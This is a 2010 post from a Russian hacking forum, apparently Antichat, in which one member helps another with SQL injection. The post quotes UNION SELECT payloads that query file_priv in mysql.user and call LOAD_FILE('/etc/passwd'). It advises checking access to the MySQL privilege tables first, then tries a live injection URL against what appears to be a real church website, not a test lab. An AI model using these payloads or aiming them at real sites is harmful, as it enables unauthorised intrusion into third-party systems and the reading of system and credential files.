30.03.2010, 00:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от jecka3000
проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user
если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?
в базе данных "mysql" информация о юзверях всегда в табличке "user", во-первых.
Во вторых, для начала проверь есть ли доступ к "mysql.user" - если нет, то file_priv в 95% случаев нет
Смотришь, есть ли доступ к mysql.user.
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+2,2,3,4+from+mysql.user
Доступа нет.
Последний раз редактировалось попугай; 30.03.2010 в 00:18..
|
|
|